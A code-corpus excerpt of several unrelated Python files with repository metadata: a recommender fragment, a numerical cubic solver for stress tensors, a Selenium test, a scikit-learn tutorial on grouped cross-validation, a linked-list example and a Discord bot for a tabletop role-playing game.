return score_list.argsort()[::-1][:self.slate_size]
# sort_docs = use_dataset[use_dataset["movieId"].isin(doc_ids)].sort_values(by=[use_dataset.columns[-1]],ascending=False)
# result_doc_ids = sort_docs['movieId'].valuesp[:self.slate_size]
# result_index = np.where(doc_ids.isin(result_doc_ids))
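# Hedged usage sketch (not part of the original class; the column names follow the
# MovieLens-style schema the methods above expect, and "observation" is the dict
# produced by the RecSim-style environment):
#   import pandas as pd
#   ratings = pd.read_csv("ratings.csv")   # must contain movieId and rating columns
#   rec = PopularityRecommender(ratings, slate_size=5, mode="0")
#   slate_indices = rec.step(reward=None, observation=observation)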
| 41.063492 | 129 | 0.625435 | 328 | 2,587 | 4.64939 | 0.246951 | 0.039344 | 0.039344 | 0.041311 | 0.114098 | 0.078689 | 0.078689 | 0.078689 | 0.078689 | 0.078689 | 0 | 0.007136 | 0.241593 | 2,587 | 62 | 130 | 41.725806 | 0.770133 | 0.225744 | 0 | 0.052632 | 0 | 0 | 0.076536 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.052632 | 0 | 0.210526 | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62237b9631ffb63f2a66aaa5496eaad99329fedc | 11,332 | py | Python | slippy/core/_stress_utils.py | FrictionTribologyEnigma/slippy | 9423a3f81e385309ffb483bab517c3d1157aba36 | [
"MIT"
] | 12 | 2020-12-06T15:30:06.000Z | 2021-12-14T06:37:15.000Z | slippy/core/_stress_utils.py | pauliwu/slippy | 9423a3f81e385309ffb483bab517c3d1157aba36 | [
"MIT"
] | null | null | null | slippy/core/_stress_utils.py | pauliwu/slippy | 9423a3f81e385309ffb483bab517c3d1157aba36 | [
"MIT"
] | 5 | 2021-03-18T05:53:11.000Z | 2022-02-16T15:18:43.000Z | import numpy as np
import numba
import slippy
from collections.abc import Sequence
__all__ = ['get_derived_stresses', 'solve_cubic']
_cuda_cubic_cache = {}
try:
import cupy as cp
def _make_cuda_cubic_solver(dtype):
eps = slippy.CUBIC_EPS
s_dtype = str(dtype)
if not s_dtype.startswith("float"):
raise ValueError("can only make cubic solver for single and double floats")
single = 'f' if str(s_dtype).endswith('32') else ''
if not single and not str(s_dtype).endswith('64'):
raise ValueError("can only make cubic solver for single and double floats")
cubic_kernel = cp.ElementwiseKernel(
"T b, T c, T d", "T r1, T r2, T r3",
f'''
if (fabs{single}(d) < {eps}) {{
// cancel and find remaining roots by quadratic formula
r1 = 0;
T diff = sqrt{single}(b*b-4*c)/2;
r2 = (-b)/2 + diff;
r3 = (-b)/2 - diff;
}} else {{
// convert to depressed cubic
T p = c-b*b/3;
T q = 2*b*b*b/27 - b*c/3 + d;
if (fabs{single}(p) < {eps}) {{
r1 = cbrt{single}(-q) - b/3;
r2 = r1;
r3 = r1;
}} else if (fabs{single}(q) < {eps}) {{
r3 = - b/3;
if (p<0) {{
T diff = sqrt{single}(-p);
r2 = diff - b/3;
r1 = - diff - b/3;
}} else {{
r1 = r3;
r2 = r3;
}}
}} else {{
T e = q*q/4 + p*p*p/27;
if (fabs{single}(e) < {eps}) {{ // two roots
r2 = -1.5*q/p - b/3;
r3 = 3*q/p - b/3;
T f_prime2 = 3*r2*r3 + 2*b*r2+c;
T f_prime3 = 3*r3*r3 + 2*b*r3+c;
if (fabs{single}(f_prime2) < fabs{single}(f_prime3)) {{
r1 = r2;
}} else {{
r1 = r3;
}}
}} else if (e>0) {{
// one root
T u = cbrt{single}(-q/2 - sqrt{single}(e));
r1 = u - p/(3*u) - b/3;
r2 = r1;
r3 = r1;
}} else {{
T u = 2*sqrt{single}(-p/3);
T t = acos{single}(3*q/p/u)/3;
T k = 2*3.14159265358979311599796346854/3;
r1 = u*cos{single}(t) - b/3;
r2 = u*cos{single}(t-k) - b/3;
r3 = u*cos{single}(t-2*k) - b/3;
}}
}}
}}
// sort the roots
T temp;
if (r1<r2) {{
if (r2>r3) {{
if (r1<r3) {{
temp = r2;
r2 = r3;
r3 = temp;
}} else {{
temp = r1;
r1 = r3;
r3 = r2;
r2 = temp;
}}
}}
}} else {{
if (r2<r3) {{
if (r1<r3) {{
temp = r1;
r1 = r2;
r2 = temp;
}} else {{
temp = r1;
r1 = r2;
r2 = r3;
r3 = temp;
}}
}} else {{
temp = r1;
r1 = r3;
r3 = temp;
}}
}}
return;
''', 'solve_cubic', return_tuple=True)
return cubic_kernel
def _solve_cubic_cuda(b, c, d):
assert isinstance(b, cp.ndarray) and isinstance(c, cp.ndarray) and isinstance(d, cp.ndarray), \
"Arrays must all be cupy arrays"
assert b.dtype == c.dtype == d.dtype, "Array dtypes must match"
if b.dtype not in _cuda_cubic_cache:
_cuda_cubic_cache[b.dtype] = _make_cuda_cubic_solver(b.dtype)
return _cuda_cubic_cache[b.dtype](b, c, d)
except ImportError:
cp = None
_solve_cubic_cuda = None
def _make_numba_cubic_solver(dtype):
eps = slippy.CUBIC_EPS
s_dtype = str(dtype)
if not s_dtype.startswith("float"):
raise ValueError("can only make cubic solver for single and double floats")
def solve_cubic_numba_base(b, c, d, r1, r2, r3):
for i in range(len(b)):
if np.abs(d[i]) < eps:
# cancel and find remaining roots by quadratic formula
r1[i] = 0
diff = np.sqrt(b[i] * b[i] - 4 * c[i]) / 2
r2[i] = (-b[i]) / 2 + diff
r3[i] = (-b[i]) / 2 - diff
else:
# convert to depressed cubic
p = c[i] - b[i] ** 2 / 3
q = 2 * b[i] ** 3 / 27 - b[i] * c[i] / 3 + d[i]
if np.abs(p) < eps:
r1[i] = np.sign(-q) * np.abs(q) ** (1 / 3) - b[i] / 3
r2[i] = r1[i]
r3[i] = r1[i]
elif np.abs(q) < eps:
r3[i] = - b[i] / 3
if p < 0:
diff = np.sqrt(-p)
r2[i] = diff - b[i] / 3
r1[i] = - diff - b[i] / 3
else:
r1[i] = r3[i]
r2[i] = r3[i]
else:
e = q * q / 4 + p * p * p / 27
if np.abs(e) < eps:
r2[i] = -1.5 * q / p - b[i] / 3
r3[i] = 3 * q / p - b[i] / 3
f_prime2 = 3 * r2[i] ** 2 + 2 * b[i] * r2[i] + c[i]
f_prime3 = 3 * r3[i] ** 2 + 2 * b[i] * r3[i] + c[i]
if np.abs(f_prime2) < np.abs(f_prime3):
r1[i] = r2[i]
else:
r1[i] = r3[i]
elif e > 0:
u = -q / 2 - np.sqrt(e)
u = np.sign(u) * np.abs(u) ** (1 / 3)
r1[i] = u - p / (3 * u) - b[i] / 3
r2[i] = r1[i]
r3[i] = r1[i]
else:
u = 2 * np.sqrt(-p / 3)
t = np.arccos(3 * q / p / u) / 3
k = 2 * np.pi / 3
r1[i] = u * np.cos(t) - b[i] / 3
r2[i] = u * np.cos(t - k) - b[i] / 3
r3[i] = u * np.cos(t - 2 * k) - b[i] / 3
# sort the array
r1[i], r2[i], r3[i] = np.sort(np.array([r1[i], r2[i], r3[i]]))
numba_type = numba.__getattribute__(s_dtype)
raw_func = numba.guvectorize([(numba_type[:], numba_type[:], numba_type[:],
numba_type[:], numba_type[:], numba_type[:])],
"(n),(n),(n)->(n),(n),(n)",
nopython=True)(solve_cubic_numba_base)
def full_func(b, c, d):
r1 = np.zeros_like(b)
r2 = np.zeros_like(b)
r3 = np.zeros_like(b)
raw_func(b, c, d, r1, r2, r3)
return r1, r2, r3
return full_func
_numba_cubic_cache = {}
def _solve_cubic_numba(b, c, d):
assert isinstance(b, np.ndarray) and isinstance(c, np.ndarray) and isinstance(d, np.ndarray), \
"Arrays must all be numpy arrays"
assert b.dtype == c.dtype == d.dtype, "Array dtypes must match"
if b.dtype not in _numba_cubic_cache:
_numba_cubic_cache[b.dtype] = _make_numba_cubic_solver(b.dtype)
return _numba_cubic_cache[b.dtype](b, c, d)
def solve_cubic(b, c, d):
""" Find roots of cubic equation x^3 + bx^2 + cx + d = 0
Parameters
----------
b, c, d: either numpy or cupy arrays
Equation coefficients, must all have the same dtype and the same shape, currently supports any floats for numpy
arrays and single or double floats for cupy arrays
Returns
-------
r1, r2, r3: arrays
Roots of the equation in ascending size order, arrays will match size, type and dtype of the input. All arrays
will always be filled, if only a single root is found this will be repeated, where there are 2 roots, the root
which does not represent a zero crossing will be repeated.
Notes
-----
Both the cuda and numba versions use just in time compilation, functions are also cached for future calls
"""
if isinstance(b, np.ndarray):
return _solve_cubic_numba(b, c, d)
elif cp is not None:
if isinstance(b, cp.ndarray):
return _solve_cubic_cuda(b, c, d)
raise TypeError(f"Cannot solve cubic, unrecognised type {str(type(b))}")
def get_derived_stresses(tensor_components: dict, required_components: Sequence, delete: bool = True) -> dict:
"""Finds derived stress terms from the full stress tensor
Parameters
----------
tensor_components: dict
The stress tensor components must have keys: 'xx', 'yy', 'zz', 'xy', 'yz', 'xz' all should be equal size
arrays
required_components: Sequence
The required derived stresses, valid items are: '1', '2', '3' and/or 'vm', relating to principal stresses and
von mises stress respectively. If tensor components are also present these will not be deleted if delete is
set to True
delete: bool, optional (True)
If True the tensor components will be deleted after computation with the exception of components who's names
are in required_components
Returns
-------
dict of derived components
"""
if not all([rc in {'1', '2', '3', 'vm'} for rc in required_components]):
raise ValueError("Unrecognised derived stress component, allowed components are: '1', '2', '3', 'vm'")
if isinstance(tensor_components['xx'], np.ndarray):
xp = np
else:
try:
float(tensor_components['xx'])
xp = np
except TypeError:
xp = slippy.xp
rtn_dict = dict()
if 'vm' in required_components:
rtn_dict['vm'] = xp.sqrt(((tensor_components['xx'] - tensor_components['yy']) ** 2 +
(tensor_components['yy'] - tensor_components['zz']) ** 2 +
(tensor_components['zz'] - tensor_components['xx']) ** 2 +
6 * (tensor_components['xy'] ** 2 +
tensor_components['yz'] ** 2 +
tensor_components['xz'] ** 2)) / 2)
if '1' in required_components or '2' in required_components or '3' in required_components:
b = -(tensor_components['xx'] + tensor_components['yy'] + tensor_components['zz'])
c = (tensor_components['xx'] * tensor_components['yy'] +
tensor_components['yy'] * tensor_components['zz'] +
tensor_components['xx'] * tensor_components['zz'] -
tensor_components['xy'] ** 2 - tensor_components['xz'] ** 2 - tensor_components[
'yz'] ** 2)
d = -((tensor_components['xx'] * tensor_components['yy'] * tensor_components['zz'] +
2 * tensor_components['xy'] * tensor_components['xz'] * tensor_components['yz'] -
tensor_components['xx'] * tensor_components['yz'] ** 2 -
tensor_components['yy'] * tensor_components['xz'] ** 2 -
tensor_components['zz'] * tensor_components['xy'] ** 2))
rtn_dict['3'], rtn_dict['2'], rtn_dict['1'] = solve_cubic(b, c, d)
return rtn_dict
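# Illustrative usage sketch (not part of the original module): for a uniaxial
# stress state with sigma_xx = 100 and every other component zero, the von
# Mises stress is 100 and the principal stresses are (100, 0, 0).
# components = {c: np.array([100.0 if c == 'xx' else 0.0])
#               for c in ('xx', 'yy', 'zz', 'xy', 'yz', 'xz')}
# derived = get_derived_stresses(components, ['vm', '1', '2', '3'])
# # derived['vm'] -> [100.], derived['1'] -> [100.],
# # derived['2'] -> [0.], derived['3'] -> [0.]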
| 38.413559 | 119 | 0.465849 | 1,482 | 11,332 | 3.452767 | 0.149123 | 0.125073 | 0.007035 | 0.028141 | 0.387141 | 0.307407 | 0.236662 | 0.185069 | 0.174907 | 0.135822 | 0 | 0.042916 | 0.399576 | 11,332 | 294 | 120 | 38.544218 | 0.709142 | 0.135634 | 0 | 0.308696 | 0 | 0.008696 | 0.325184 | 0.018129 | 0 | 0 | 0 | 0 | 0.017391 | 1 | 0.034783 | false | 0 | 0.026087 | 0 | 0.095652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62243587267acb026051d3bbf9e015260495fca0 | 890 | py | Python | src/tests/test_FormAprobarDocumento.py | DaniDuran/Selenium_Inmofianza | bc1e9643cb720057f8e49a695f70df9e3c7a511c | [
"MIT"
] | 1 | 2021-12-17T05:18:47.000Z | 2021-12-17T05:18:47.000Z | src/tests/test_FormAprobarDocumento.py | daninarvaezr/SeleniumInmofianza | 51d488043188b87199dbf28b9f7ef6d43f5163d9 | [
"MIT"
] | null | null | null | src/tests/test_FormAprobarDocumento.py | daninarvaezr/SeleniumInmofianza | 51d488043188b87199dbf28b9f7ef6d43f5163d9 | [
"MIT"
] | null | null | null | import selenium
from functions.Functions import Functions as Selenium
import unittest
from classes.FormLogin import EventLogin
from classes.FormTerminosCondiciones import EventTerminosCondiciones as EventTC
from classes.FormAprobacionDocumentos import EventAprobarDocumentos as EventAD
class AprobacionDocumento(Selenium,unittest.TestCase):
def setUp(self):
Selenium.abrir_navegador(self)
Selenium.get_json_file(self,"AprobacionDocumentos")
self.driver.maximize_window()
def testAprobarDocumento(self):
Cedula=Selenium.leer_celda(self, 'K7')
EventLogin.Loguin(self,Cedula,Cedula)
EventTC.AceptarTratamientoDatos(self)
EventTC.AceptarEnrolamiento(self)
EventTC.AceptarFirmaElectronica(self)
EventAD.AprobacionDocumento(self)
Selenium.esperar(self, 2)
if __name__ == '__main__':
unittest.main()
| 34.230769 | 79 | 0.764045 | 87 | 890 | 7.666667 | 0.505747 | 0.049475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002688 | 0.164045 | 890 | 25 | 80 | 35.6 | 0.893817 | 0 | 0 | 0 | 0 | 0 | 0.033708 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
622532b597cc4879ef93c8058719514e0a489cfd | 6,624 | py | Python | python_scripts/cross_validation_grouping.py | aquinquenel/scikit-learn-mooc | edb91f1669ffad65038f5bf48a6771299be4c09d | [
"CC-BY-4.0"
] | 1 | 2022-02-17T13:13:52.000Z | 2022-02-17T13:13:52.000Z | python_scripts/cross_validation_grouping.py | aquinquenel/scikit-learn-mooc | edb91f1669ffad65038f5bf48a6771299be4c09d | [
"CC-BY-4.0"
] | null | null | null | python_scripts/cross_validation_grouping.py | aquinquenel/scikit-learn-mooc | edb91f1669ffad65038f5bf48a6771299be4c09d | [
"CC-BY-4.0"
] | null | null | null | # ---
# jupyter:
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# %% [markdown]
# # Sample grouping
# We are going to take a closer look at the concept of sample groups. As in the
# previous section, we will give an example to highlight some surprising
# results. This time, we will use the handwritten digits dataset.
# %%
from sklearn.datasets import load_digits
digits = load_digits()
data, target = digits.data, digits.target
# %% [markdown]
# We will recreate the same model used in the previous exercise:
# a logistic regression classifier with preprocessor to scale the data.
# %%
from sklearn.preprocessing import MinMaxScaler
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline
model = make_pipeline(MinMaxScaler(), LogisticRegression(max_iter=1_000))
# %% [markdown]
# We will use the same baseline model. We will use a `KFold` cross-validation
# without shuffling the data at first.
# %%
from sklearn.model_selection import cross_val_score, KFold
cv = KFold(shuffle=False)
test_score_no_shuffling = cross_val_score(model, data, target, cv=cv,
n_jobs=2)
print(f"The average accuracy is "
f"{test_score_no_shuffling.mean():.3f} +/- "
f"{test_score_no_shuffling.std():.3f}")
# %% [markdown]
# Now, let's repeat the experiment by shuffling the data within the
# cross-validation.
# %%
cv = KFold(shuffle=True)
test_score_with_shuffling = cross_val_score(model, data, target, cv=cv,
n_jobs=2)
print(f"The average accuracy is "
f"{test_score_with_shuffling.mean():.3f} +/- "
f"{test_score_with_shuffling.std():.3f}")
# %% [markdown]
# We observe that shuffling the data improves the mean accuracy.
# We could go a little further and plot the distribution of the testing
# score. We can first concatenate the test scores.
# %%
import pandas as pd
all_scores = pd.DataFrame(
[test_score_no_shuffling, test_score_with_shuffling],
index=["KFold without shuffling", "KFold with shuffling"],
).T
# %% [markdown]
# Let's plot the distribution now.
# %%
import matplotlib.pyplot as plt
all_scores.plot.hist(bins=10, edgecolor="black", alpha=0.7)
plt.xlim([0.8, 1.0])
plt.xlabel("Accuracy score")
plt.legend(bbox_to_anchor=(1.05, 0.8), loc="upper left")
_ = plt.title("Distribution of the test scores")
# %% [markdown]
# The cross-validation testing error obtained with shuffling has less variance
# than the one obtained without shuffling. This means that some specific folds
# lead to a low score in the unshuffled case.
# %%
print(test_score_no_shuffling)
# %% [markdown]
# Thus, there is an underlying structure in the data that shuffling breaks,
# which is why shuffling yields better results. To get a better understanding,
# we should read the documentation shipped with the dataset.
# %%
print(digits.DESCR)
# %% [markdown]
# If we read carefully, 13 writers wrote the digits of our dataset, for a total
# of 1797 samples. Thus, each writer wrote the same numbers several times.
# Let's suppose that the samples from each writer are grouped together.
# Consequently, not shuffling the data keeps all of a writer's samples together
# in either the training or the testing set. Shuffling the data breaks this
# structure, and therefore digits written by the same writer become available
# in both the training and testing sets.
#
# Besides, a writer will usually tend to write digits in the same manner. Thus,
# our model will learn to identify a writer's pattern for each digit instead of
# recognizing the digit itself.
#
# We can solve this problem by ensuring that the data associated with a writer
# belongs either to the training set or to the testing set. Thus, we want to
# group the samples by writer.
#
# Indeed, we can recover the groups by looking at the target variable.
# %%
target[:200]
# %% [markdown]
#
# It might not be obvious at first, but there is a structure in the target:
# there is a repetitive pattern that always starts with a series of ordered
# digits from 0 to 9 followed by random digits at a certain point. If we look
# in detail, we see that there are 14 such patterns, each with around 130
# samples.
#
# Even if this does not exactly correspond to the 13 writers in the
# documentation (maybe one writer wrote two series of digits), we can
# hypothesize that each of these patterns corresponds to a different writer
# and thus a different group.
# %%
from itertools import count
import numpy as np
# defines the lower and upper bounds of sample indices
# for each writer
writer_boundaries = [0, 130, 256, 386, 516, 646, 776, 915, 1029,
1157, 1287, 1415, 1545, 1667, 1797]
groups = np.zeros_like(target)
lower_bounds = writer_boundaries[:-1]
upper_bounds = writer_boundaries[1:]
for group_id, lb, up in zip(count(), lower_bounds, upper_bounds):
groups[lb:up] = group_id
# %% [markdown]
# We can check the grouping by plotting the indices linked to writer ids.
# %%
plt.plot(groups)
plt.yticks(np.unique(groups))
plt.xticks(writer_boundaries, rotation=90)
plt.xlabel("Target index")
plt.ylabel("Writer index")
_ = plt.title("Underlying writer groups existing in the target")
# %% [markdown]
# Once we group the digits by writer, we can use cross-validation to take this
# information into account: the class containing `Group` should be used.
# %%
from sklearn.model_selection import GroupKFold
cv = GroupKFold()
test_score = cross_val_score(model, data, target, groups=groups, cv=cv,
n_jobs=2)
print(f"The average accuracy is "
f"{test_score.mean():.3f} +/- "
f"{test_score.std():.3f}")
# %% [markdown]
# We see that this strategy is less optimistic regarding the model's
# generalization performance. However, it is the most reliable estimate if our
# goal is handwritten digit recognition that is independent of the writer. We
# can also see that the standard deviation was reduced.
# %%
all_scores = pd.DataFrame(
[test_score_no_shuffling, test_score_with_shuffling, test_score],
index=["KFold without shuffling", "KFold with shuffling",
"KFold with groups"],
).T
# %%
all_scores.plot.hist(bins=10, edgecolor="black", alpha=0.7)
plt.xlim([0.8, 1.0])
plt.xlabel("Accuracy score")
plt.legend(bbox_to_anchor=(1.05, 0.8), loc="upper left")
_ = plt.title("Distribution of the test scores")
# %% [markdown]
# In conclusion, it is really important to take any sample grouping pattern
# into account when evaluating a model. Otherwise, the results obtained will
# be over-optimistic with regard to reality.
| 33.624365 | 81 | 0.726449 | 1,001 | 6,624 | 4.727273 | 0.332667 | 0.028529 | 0.013948 | 0.025359 | 0.20541 | 0.172866 | 0.156382 | 0.137785 | 0.137785 | 0.137785 | 0 | 0.020826 | 0.180857 | 6,624 | 196 | 82 | 33.795918 | 0.851272 | 0.557971 | 0 | 0.30303 | 0 | 0 | 0.201977 | 0.067444 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.151515 | 0 | 0.151515 | 0.075758 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6226925f72a08608a36cb3ffbbec7e4e50c599b0 | 732 | py | Python | linkedlist/length_of_linkedlist.py | dhruvilgandhi/DSA-Together-HacktoberFest | fda752e0622544c83e11f1caf1cc99f36792069e | [
"MIT"
] | 16 | 2021-10-02T20:10:51.000Z | 2022-03-06T10:31:11.000Z | linkedlist/length_of_linkedlist.py | dhruvilgandhi/DSA-Together-HacktoberFest | fda752e0622544c83e11f1caf1cc99f36792069e | [
"MIT"
] | 55 | 2021-10-02T07:31:41.000Z | 2021-10-30T06:19:26.000Z | linkedlist/length_of_linkedlist.py | dhruvilgandhi/DSA-Together-HacktoberFest | fda752e0622544c83e11f1caf1cc99f36792069e | [
"MIT"
] | 36 | 2021-10-02T18:00:08.000Z | 2022-01-03T18:50:35.000Z | class Node :
    def __init__(self, data):
self.data = data
self.next = None
class LinkedList:
def __init__(self):
self.head = None
    def insertNode(self, value):
newNode = Node(value)
newNode.next = self.head
self.head = newNode
    def getLength(self):
temp = self.head
count = 0
while(temp):
count += 1
temp = temp.next
return count
if __name__ == '__main__':
MyList = LinkedList()
MyList.insertNode(10)
MyList.insertNode(20)
MyList.insertNode(30)
MyList.insertNode(40)
MyList.insertNode(50)
len_list = MyList.getLength()
print("Length of the Linked List is : " , len_list)
| 23.612903 | 55 | 0.575137 | 84 | 732 | 4.797619 | 0.440476 | 0.198511 | 0.054591 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024292 | 0.325137 | 732 | 30 | 56 | 24.4 | 0.791498 | 0 | 0 | 0 | 0 | 0 | 0.053279 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148148 | false | 0 | 0 | 0 | 0.259259 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6226c2ab2a637d69d5940ef47a6fc0d0d6f0975f | 18,434 | py | Python | main.py | moose705/moosebot | 87aa2fe0b61fa3201a9d8977568f1fbf4da73491 | [
"Unlicense"
] | null | null | null | main.py | moose705/moosebot | 87aa2fe0b61fa3201a9d8977568f1fbf4da73491 | [
"Unlicense"
] | null | null | null | main.py | moose705/moosebot | 87aa2fe0b61fa3201a9d8977568f1fbf4da73491 | [
"Unlicense"
] | null | null | null | import os
import random
import sys
from dotenv import load_dotenv
import characters
import items
import names
import random_lists
import shared_functions
import traits
import wizard
from bot import bot as bot
from shared_functions import party as party
from shared_functions import npcs as npcs
from shared_functions import world as world
# below: laziness
load_dotenv()
TOKEN = os.getenv("TOKEN")
# Party & NPC Management
next_backstory = None
next_name = None
next_short_name = None
@bot.command(name='countitems')
async def count_items(ctx):
await ctx.send("There are " + str(len(items.item_dict)) + " items currently in the item pool.")
@bot.command(name='countbackstories')
async def count_backstories(ctx):
num_backstories = len(random_lists.Backstories)
await ctx.send("There are " + str(num_backstories) + " backstories currently in the backstory pool.")
@bot.command(name='nextname')
async def next_name_function(ctx, name):
global next_short_name
global next_name
next_short_name = name.split(" ")[0]
if shared_functions.find_character(next_short_name) is not None:
await ctx.send("A character already exists with the name " + next_short_name + ".")
next_short_name = None
return
next_name = name
@bot.command(name='nextbackstory')
async def next_backstory_function(ctx, backstory):
global next_backstory
next_backstory = backstory
@bot.command(name='additem', aliases=["item"])
async def add_item(ctx, name, item):
character = shared_functions.find_character(name)
if not character:
await ctx.send("Character does not exist!")
return
for i in range(0, len(character["Inventory"])):
if character["Inventory"][i] == "Empty slot" or character["Inventory"][i] == "Empty Slot":
character["Inventory"][i] = item
break
else:
await ctx.send(name + "'s inventory is full!")
return
await ctx.send(embed=characters.print_character(name))
@bot.command(name='removeitem', aliases=["take", "drop"])
async def remove_item(ctx, name, item):
character = shared_functions.find_character(name)
if not character:
await ctx.send("Character does not exist!")
return
length = len(item)
for i in range(0, len(character["Inventory"])):
print(character["Inventory"][i][0:length])
if character["Inventory"][i][0:length] == item:
character["Inventory"][i] = "Empty slot"
break
else:
await ctx.send("Item not found.")
return
await ctx.send(embed=characters.print_character(name))
@bot.command(name='pay', aliases=["givemoney", "givegold"])
async def pay(ctx, name, gold):
await increase(ctx, name, "Gold", gold)
@bot.command(name='increase', aliases=["increasestat", "boost", "booststat"])
async def increase(ctx, name, stat, number):
try:
number = int(number)
except ValueError:
await ctx.send("Stat must be increased by a number.")
return
character = shared_functions.find_character(name)
if not character:
await ctx.send("Character " + name + " does not exist")
return
if stat not in character:
await ctx.send("Stat " + stat + " does not exist")
return
try:
# prevent some jackass from crashing bot by trying to increase "Backstory"
int(character[stat])
except ValueError:
await ctx.send("Are you trying to increase a non-numerical stat...?")
return
character[stat] += number
await ctx.send(embed=characters.print_character(name))
@bot.command(name='decrease', aliases=["lowerstat", "decreasestat", "lower"])
async def decrease(ctx, name, stat, number):
await increase(ctx, name, stat, -int(number))
@bot.command(name='damage', aliases=["hurt"])
async def damage(ctx, name, number):
await decrease(ctx, name, "Health", number)
character = shared_functions.find_character(name)
if character and character["Health"] <= 0:
await kill_char(ctx, name)
@bot.command(name='heal', aliases=["restore"])
async def heal(ctx, name, number=None):
if number is not None:
await increase(ctx, name, "Health", number)
else:
character = shared_functions.find_character(name)
if not character:
await ctx.send("Character " + name + " does not exist, dummy")
return
# hardcoded max health right now; will eventually need to change to a character["Max Health"] attribute if i
# implement things like Blessing of Bloat
characters.change_character_data(name, "Health", 2 * character["Strongness"] + 1)
await ctx.send(embed=characters.print_character(name))
@bot.command(name='check', aliases=["statcheck"])
async def check(ctx, name, stat, required_number, global_modifier=0):
try:
required_number = int(required_number)
except ValueError:
target = shared_functions.find_character(required_number)
if not target:
await ctx.send("There is no character named " + required_number)
return
if stat not in target:
await ctx.send(required_number + " has no stat " + stat)
return
required_number = target[stat]
# get required_number from target stat.
character = shared_functions.find_character(name)
if not character:
await ctx.send("There is no character named " + name)
return
try:
global_modifier = int(global_modifier)
except ValueError:
await ctx.send("Modifier is not a number...")
return
if stat not in character:
await ctx.send(name + " has no stat " + stat)
return
global_modifier += world["modifier"]
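    # d20-style contested check: a natural 20 always passes, a natural 1 always
    # fails; otherwise (stat - target) + roll + modifiers must reach 11 to pass.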
roll = random.randint(1, 20)
print(roll)
passed = False
if roll == 20:
passed = True
elif roll == 1:
pass
else:
if (character[stat] - required_number) + roll + global_modifier >= 11:
passed = True
if passed:
await ctx.send(stat + " check passed!")
else:
await ctx.send(stat + " check failed!")
@bot.command(name='combat', aliases=["fight", "attack"])
async def combat(ctx, name, weapon_damage, target, global_modifier=0, stat="Strongness"):
damage_target = False
try:
defense = int(target)
except ValueError:
target_character = shared_functions.find_character(target)
if not target_character:
await ctx.send("Could not find target.")
return
if stat in target_character:
defense = target_character[stat]
else:
await ctx.send("Stat does not exist.")
damage_target = True
try:
global_modifier = int(global_modifier)
weapon_damage = int(weapon_damage)
except ValueError:
await ctx.send("One of the numerical parameters was not a number.")
return
character = shared_functions.find_character(name)
global_modifier += world["modifier"]
if not character:
await ctx.send("No character named " + name)
return
if stat not in character:
await ctx.send("Invalid stat")
return
roll = random.randint(1, 20)
print(roll)
miss = False
crit = 1
if roll == 20:
crit = 2
if roll == 1:
miss = True
else:
damage_done = (character[stat] - defense + roll + global_modifier - 10) * (weapon_damage * crit)
if damage_done < 0:
damage_done = 0
if miss:
await ctx.send("Missed!")
else:
if damage_target and damage_done > 0:
await damage(ctx, target, damage_done)
await ctx.send("Did " + str(damage_done) + " damage!")
if crit > 1:
await ctx.send("A critical hit!")
@bot.command(name='killchar', aliases=["kill", "nuke"])
async def kill_char(ctx, name):
# TODO: Have a character drop their entire inventory upon being killed, activating any explosives.
# It would be pretty comical to randomly trigger %use (prompting for a target if necessary).
# TODO: File away deceased characters in an additional dictionary for use with Necromancer.
character = shared_functions.find_character(name)
if not character:
await ctx.send("Could not find party member or NPC named " + name)
return
if name in npcs.keys():
relevant_dict = npcs
else:
relevant_dict = party
# later: add to necromancy dictionary
response = "**" + relevant_dict[name]["Name"] + " has been slain.**"
for item in relevant_dict[name]["Inventory"]:
if item != "Empty slot":
response += "\nThe following item dropped: " + items.item_dict[item].print_teaser()
relevant_dict.pop(name, False)
shared_functions.backup_characters()
await ctx.send(response)
@bot.command(name='party')
async def print_party(ctx, name=None):
if not name:
for character_name in party.keys():
response = characters.print_character(character_name)
await ctx.send(embed=response)
else:
response = characters.print_character(name)
await ctx.send(embed=response)
@bot.command(name='npc')
async def npc(ctx, name=None):
if not name:
length = str(len(npcs.keys()))
await ctx.send("There are currently " + length + " NPCs in the pool.")
return
if name == "all":
for character in npcs:
await ctx.send(embed=characters.print_character(character))
else:
await ctx.send(embed=characters.print_character(name))
@bot.command(name='randnpc')
async def randnpc(ctx):
if len(npcs.keys()) == 0:
await ctx.send("There are no NPCs!")
return
npc = random.choice(list(npcs.keys()))
await ctx.send(embed=characters.print_character(npc))
